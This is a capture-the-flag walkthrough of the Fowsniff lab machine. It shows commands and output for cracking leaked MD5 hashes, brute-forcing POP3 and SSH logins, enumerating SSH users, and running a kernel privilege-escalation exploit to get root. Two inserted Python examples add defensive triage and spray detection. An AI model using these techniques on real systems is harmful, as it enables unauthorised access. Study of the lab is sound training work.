fowsniff - danielcastropalomares/security GitHub Wiki

In a first scan we find the following ports:

root@kali:~# nmap -p- 172.31.255.133                                        
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-09 18:34 CET             
Nmap scan report for 172.31.255.133                                         
Host is up (0.000068s latency).                                             
Not shown: 65531 closed ports                                               
PORT    STATE SERVICE                                                       
22/tcp  open  ssh                                                           
80/tcp  open  http                                                          
110/tcp open  pop3                                                          
143/tcp open  imap
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.61 seconds

root@kali:~# nmap -A 172.31.255.133
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-09 18:34 CET
Nmap scan report for 172.31.255.133
Host is up (0.00047s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP AUTH-RESP-CODE CAPA UIDL PIPELINING SASL(PLAIN) USER
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: ENABLE AUTH=PLAINA0001 OK post-. login LITERAL+ ID listed have SASL-IR more IMAP4rev1 capabilities . login-REFERRALS IDLE Pre-. login
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 172.31.255.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.46 seconds

If we browse the website, one of its sections contains the following:

The attackers were also able to hijack our official @fowsniffcorp Twitter account. All of our official tweets have been deleted and the attackers may release sensitive information via this medium. We are working to resolve this at soon as possible.

On Twitter we find the account and the following tweet:

https://twitter.com/FowsniffCorp/status/972208944285388800

Which leads us to a pastebin.com paste:

https://pastebin.com/NrAqVeeX
https://pastebin.com/raw/NrAqVeeX


mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

With John the Ripper we crack the hashes:

root@kali:/tmp# john --format=raw-md5 --wordlist=rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
scoobydoo2       (?)
orlando12        (?)
apples01         (?)
skyler22         (?)
mailcall         (?)
07011972         (?)
carp4ever        (?)
bilbo101         (?)
8g 0:00:00:24 DONE (2018-12-11 20:31) 0.3304g/s 592481p/s 592481c/s 1515KC/s             ..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The results can be looked up in the following file:

/root/.john/john.pot
$dynamic_0$90dc16d47114aa13671c697fd506cf26:scoobydoo2
$dynamic_0$4d6e42f56e127803285a0a7649b5ab11:orlando12
$dynamic_0$1dc352435fecca338acfd4be10984009:apples01
$dynamic_0$19f5af754c31f1e2651edde9250d69bb:skyler22
$dynamic_0$8a28a94a588a95b80163709ab4313aa4:mailcall
$dynamic_0$f7fd98d380735e859f8b2ffbbede5a7e:07011972
$dynamic_0$0e9588cb62f4b6f27e33d449e2ba0b3b:carp4ever
$dynamic_0$ae1644dac5b77c0cf51e0d26ad6d7e56:bilbo101
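As an added example that is not part of the original write-up, the following Python joins the pastebin dump with john.pot to show which accounts had their password recovered and which leaked hashes remain uncracked, which is the list an incident responder needs when deciding what to reset; the data is quoted from above and the function names are this example's own.

```python
# Added example (not part of the original write-up): join the leaked
# "account:md5" dump with john.pot so a responder can list which accounts
# have a recovered, burned password. Data is quoted from above; code is new.
import hashlib
LEAK = """\
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
"""
JOHN_POT = """\
$dynamic_0$90dc16d47114aa13671c697fd506cf26:scoobydoo2
$dynamic_0$4d6e42f56e127803285a0a7649b5ab11:orlando12
$dynamic_0$1dc352435fecca338acfd4be10984009:apples01
$dynamic_0$19f5af754c31f1e2651edde9250d69bb:skyler22
$dynamic_0$8a28a94a588a95b80163709ab4313aa4:mailcall
$dynamic_0$f7fd98d380735e859f8b2ffbbede5a7e:07011972
$dynamic_0$0e9588cb62f4b6f27e33d449e2ba0b3b:carp4ever
$dynamic_0$ae1644dac5b77c0cf51e0d26ad6d7e56:bilbo101
"""

def parse_pairs(text, strip_prefix=""):
    """Parse 'key:value' lines into a dict, dropping strip_prefix from keys."""
    pairs = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.strip().split(":", 1)
            pairs[key.removeprefix(strip_prefix).lower()] = value
    return pairs

def triage(leak_text, pot_text):
    """Return (cracked, uncracked): cracked maps account -> password for each
    leaked hash John recovered, re-hashing the plaintext so a mis-copied pot
    line cannot be attributed to the wrong account; uncracked still need a reset."""
    # john.pot tags raw-MD5 entries with $dynamic_0$; strip it to join on digest
    pot = parse_pairs(pot_text, strip_prefix="$dynamic_0$")
    cracked, uncracked = {}, []
    for account, digest in parse_pairs(leak_text).items():
        plain = pot.get(digest)
        if plain is not None and hashlib.md5(plain.encode()).hexdigest() == digest:
            cracked[account] = plain
        else:
            uncracked.append(account)
    return cracked, sorted(uncracked)
```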

Rather than trying the credentials one by one, we use the nmap script to test the credentials we obtained. We create two lists, one with the users and one with the passwords:

root@kali:~# cat /tmp/userdb 
mauer@fowsniff
mustikka@fowsniff
tegel@fowsniff
baksteen@fowsniff
seina@fowsniff
stone@fowsniff
mursten@fowsniff
parede@fowsniff
sciana@fowsniff
mauer
mustikka
tegel
baksteen
seina
stone
mursten
parede
sciana

root@kali:~# cat /tmp/passwd 
mailcall
bilbo101
apples01
skyler22
scoobydoo2
carp4ever
orlando12
07011972

And now we run nmap:

root@kali:~# nmap -sV --script pop3-brute -script-args passdb=/tmp/passwd,userdb=/tmp/userdb 172.31.255.133
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
| pop3-brute: 
|   Accounts: 
|     seina:scoobydoo2 - Valid credentials
|_  Statistics: Performed 159 guesses in 117 seconds, average tps: 1.3
143/tcp open  imap    Dovecot imapd

Now we connect to POP3 via telnet:

root@kali:~# telnet 172.31.255.133 110
Trying 172.31.255.133...
Connected to 172.31.255.133.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
+OK
PASS scoobydoo2
+OK Logged in.

We see that there are two messages:

LIST
+OK 2 messages:
1 1622
2 1280

We read the first mail. Note that it is addressed to all the users of the mail accounts listed earlier, so it looks like the admin has changed every user's password on the system to "S1ck3nBluff+secureshell".

retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
	id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via 
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

Since we don't know which user has changed their password to S1ck3nBluff+secureshell, we enumerate the users and then brute-force SSH:

msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.133:22 - SSH - Using malformed packet technique
[*] 172.31.255.133:22 - SSH - Starting scan
[+] 172.31.255.133:22 - SSH - User 'mauer' found
[+] 172.31.255.133:22 - SSH - User 'mustikka' found
[+] 172.31.255.133:22 - SSH - User 'tegel' found
[+] 172.31.255.133:22 - SSH - User 'baksteen' found
[+] 172.31.255.133:22 - SSH - User 'seina' found
[+] 172.31.255.133:22 - SSH - User 'stone' found
[+] 172.31.255.133:22 - SSH - User 'mursten' found
[+] 172.31.255.133:22 - SSH - User 'parede' found
[+] 172.31.255.133:22 - SSH - User 'sciana' found

And now we try the password above against all the users on the system:

root@kali:~# cat /tmp/passwd1
S1ck3nBluff+secureshell

root@kali:~# nmap -sV --script ssh-brute -script-args passdb=/tmp/passwd1,userdb=/tmp/userdb 172.31.255.133
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-brute: 
|   Accounts: 
|     baksteen:S1ck3nBluff+secureshell - Valid credentials
|_  Statistics: Performed 18 guesses in 7 seconds, average tps: 2.6
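From the defender's side, as an added example that is not part of the original write-up: the pop3-brute and ssh-brute runs above leave a distinctive trace on the server (many failed logins from one source spread across many accounts, then a single success). The log lines below are constructed for this example in Dovecot's and OpenSSH's usual syslog format; the source address 172.31.255.1 and the thresholds are assumptions.

```python
# Added example (not part of the original write-up): flag the password
# spraying seen above (many failed logins from one source across many
# accounts, then one success) in Dovecot and OpenSSH syslog lines, so the
# reused credential can be rotated. Log lines, the source address
# 172.31.255.1 and the thresholds are constructed assumptions.
import re
from collections import defaultdict

DOVECOT = re.compile(r"pop3-login: (?P<result>Disconnected \(auth failed|Login)[^:]*: "
                     r"user=<(?P<user>[^>]*)>.*rip=(?P<ip>[\d.]+)")
SSHD = re.compile(r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
                  r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")

SAMPLE_LOG = """\
Mar 13 14:50:01 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mauer>, method=PLAIN, rip=172.31.255.1, lip=172.31.255.133
Mar 13 14:50:03 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mustikka>, method=PLAIN, rip=172.31.255.1, lip=172.31.255.133
Mar 13 14:50:05 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<tegel>, method=PLAIN, rip=172.31.255.1, lip=172.31.255.133
Mar 13 14:50:07 fowsniff dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=172.31.255.1, lip=172.31.255.133
Mar 13 14:52:10 fowsniff sshd[1201]: Failed password for mauer from 172.31.255.1 port 40001 ssh2
Mar 13 14:52:11 fowsniff sshd[1202]: Failed password for mustikka from 172.31.255.1 port 40002 ssh2
Mar 13 14:52:12 fowsniff sshd[1203]: Failed password for tegel from 172.31.255.1 port 40003 ssh2
Mar 13 14:52:13 fowsniff sshd[1204]: Accepted password for baksteen from 172.31.255.1 port 40004 ssh2
Mar 13 16:55:40 fowsniff sshd[1300]: Accepted password for stone from 192.168.7.36 port 50001 ssh2
"""

def analyze(log_text, min_failures=3, min_distinct_users=3):
    """Return (sprayers, compromised): (service, ip) sources with at least
    min_failures failed logins spread over min_distinct_users accounts, and
    the (service, ip, user) logins that succeeded from such a source."""
    failures = defaultdict(list)   # (service, ip) -> users tried
    successes = []                 # (service, ip, user)
    for line in log_text.splitlines():
        for service, pattern in (("pop3", DOVECOT), ("ssh", SSHD)):
            m = pattern.search(line)
            if not m:
                continue
            if m["result"] in ("Login", "Accepted"):
                successes.append((service, m["ip"], m["user"]))
            else:
                failures[(service, m["ip"])].append(m["user"])
            break
    sprayers = sorted(key for key, users in failures.items()
                      if len(users) >= min_failures
                      and len(set(users)) >= min_distinct_users)
    compromised = sorted(s for s in successes if (s[0], s[1]) in sprayers)
    return sprayers, compromised
```

The stone login from 192.168.7.36 is left alone because no failures preceded it; only successes that follow a spray from the same source are reported.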

We now have access to the system as user baksteen:

root@kali:~# ssh baksteen@172.31.255.133
baksteen@172.31.255.133's password: 

	                    _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions


   ****  Welcome to the Fowsniff Corporate Server! **** 

	      ---------- NOTICE: ----------

 * Due to the recent security breach, we are running on a very minimal system.
 * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.


New release '18.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36
baksteen@fowsniff:~$ 

The user has no sudo rights:

baksteen@fowsniff:~$ sudo -l
[sudo] password for baksteen: 
Sorry, user baksteen may not run sudo on fowsniff.

We look for binaries with the SUID bit set:

baksteen@fowsniff:~$ find / -perm -u=s -type f 2>/dev/null 
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
/bin/ntfs-3g
/bin/ping6
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/sudo
/usr/bin/chsh

We try to list the other users' directories in case they hold any useful information:

baksteen@fowsniff:/home$ du -h
du: cannot read directory './seina': Permission denied
4.0K    ./seina
du: cannot read directory './stone': Permission denied
4.0K    ./stone
du: cannot read directory './mustikka': Permission denied
4.0K    ./mustikka
du: cannot read directory './parede': Permission denied
4.0K    ./parede
du: cannot read directory './tegel': Permission denied
4.0K    ./tegel
4.0K    ./baksteen/.cache
4.0K    ./baksteen/Maildir/tmp
4.0K    ./baksteen/Maildir/cur
8.0K    ./baksteen/Maildir/new
32K     ./baksteen/Maildir
76K     ./baksteen
du: cannot read directory './mursten': Permission denied
4.0K    ./mursten
du: cannot read directory './sciana': Permission denied
4.0K    ./sciana
du: cannot read directory './mauer': Permission denied
4.0K    ./mauer
112K    .

Let's try to escalate privileges with a kernel exploit:

baksteen@fowsniff:~$ uname -a
Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

We search for that specific version:

searchsploit linux kernel 4.4
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation   | exploits/linux/local/4429

Since the target machine does not have gcc installed, we compile it locally on our own machine and then upload it:

root@kali:/tmp# gcc /usr/share/exploitdb/exploits/linux/local/44298.c -o /tmp/44298 -pthread
root@kali:/tmp# scp /tmp/44298 baksteen@172.31.255.133:/tmp/

We run it and we have root:

baksteen@fowsniff:/tmp$ ./44298
task_struct = ffff8800166a7000
uidptr = ffff88001f33f9c4
spawning root shell
root@fowsniff:/tmp# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(baksteen)

root@fowsniff:/root# cat flag.txt 
   ___                        _        _      _   _             _ 
  / __|___ _ _  __ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |
 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|
  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
	       |___/ 

 (_)
  |--------------
  |&&&&&&&&&&&&&&|
  |    R O O T   |
  |    F L A G   |
  |&&&&&&&&&&&&&&|
  |--------------
  |
  |
  |
  |
  |
  |
 ---

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.